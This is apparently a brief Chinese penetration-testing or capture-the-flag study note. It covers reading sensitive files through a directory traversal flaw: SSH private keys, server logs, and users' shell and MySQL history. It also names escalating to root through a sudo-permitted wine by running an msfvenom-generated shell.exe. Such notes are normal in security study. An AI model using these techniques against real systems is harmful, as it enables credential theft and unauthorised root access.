当得知目标存在目录遍历漏洞时,并且可以读取/etc/passwd文件,不能固化思维,只看能否得到ssh私钥文件,或者nginx以及ssh访问日志文件,有了目录遍历漏洞后,应逐个查看目录,看有无相关文件
-
需要重点查看对于每个用户是否可以读取.bash_history以及.mysql_history文件
-
sudo -l得到wine有root权限时,wine本身不能直接提权,但是wine可以执行exe文件,因此可以通过msfvenom生成shell.exe文件
STRIVE FOR PROGRESS,NOT FOR PERFECTION
